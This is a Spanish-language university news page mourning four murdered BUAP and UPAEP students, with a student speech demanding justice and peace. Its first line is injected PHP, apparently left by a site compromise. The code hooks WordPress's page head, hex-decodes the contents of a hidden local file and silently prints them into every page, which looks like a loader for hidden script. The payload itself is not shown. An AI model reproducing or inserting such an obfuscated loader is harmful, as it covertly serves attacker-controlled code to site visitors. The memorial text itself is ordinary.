if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Otra vez el luto viste a la Buap y a la UPAEP – La Opinión Universitaria La Opinión Universitaria
Menu

Otra vez el luto viste a la Buap y a la UPAEP

 

+ In Memorían por Ximena y José Antonio, por Francisco Javier y Josué

“Despertemos del sueño indiferente de la apatía y la resignación”

Otra vez el luto invadió a la Upaep, hace dos años perdieron a Mara, ahora a Ximena y a José Antonio.

En la ceremonia de despedida , Itzel Montiel, Presidenta de la mesa directiva de Relaciones Internacionales, con palabras emotivas, despidió a sus compañeros colombianos

Nos faltan Ximena, José Antonio, Francisco Javier y Josué Emanuel. Hoy recordamos en el Campus Central, la ausencia de nuestros compañeros asesinados. Exigimos justicia y paz. Nuestro dolor es de todos. A continuación compartimos los mensajes a la comunidad pronunciados durante el acto de recuerdo, por nuestra compañera Itzel Montiel, alumna de la licenciatura en Relaciones Internacionales y por el secretario general de nuestra institución, José Antonio Llergo Victoria.

Con el puño en alto, exijamos justicia. Mensaje estudiantil a toda la comunidad.

Hoy nos encontramos frente a una situación en la cual las palabras no son suficientes. Puebla nos ha arrebatado el sueño, y con ello la vida de muchos; esta semana sus muertes han llegado a nuestro nido.

Vivimos en una sociedad en la cual hemos normalizado la violencia, pareciera que hablamos al aire y este no nos responde; hoy nos encontramos con escritorios, consultorios, lugares en la mesa varios y quedan familias rotas, donde quedaron abrazos y caricias por dar.

En las últimas 72 horas nuestra alma se ha llenado de indignación, se ha cansado del constante miedo. Ayer fuimos partícipes y hoy testigos del alcance de la respuesta de la comunidad estudiantil.

Hemos presenciado el redoblar de nuestros pasos. Hemos escuchado el clamor de nuestra voz. Hemos reconocido rostros y miradas. No fuimos solamente una manifestación, fuimos el latir de un solo corazón.

Hoy no existe la institución. En México, la situación se nos ha salido de las manos, le permitimos a la violencia apoderarse de nuestra vida. Esta no discrimina, no discrimina entre edad, genero, ni clase social. Ella nos obliga como comunidad universitaria a un llamado de acción.

Despertemos del sueño indiferente de la apatía y la resignación, que nos levante el compromiso de construir un México mejor.

Con el puño en alto, exijamos justicia. Exijamos respuestas concretas, porque no podemos olvidar a los que ya no tienen voz.

  • Tweets recientes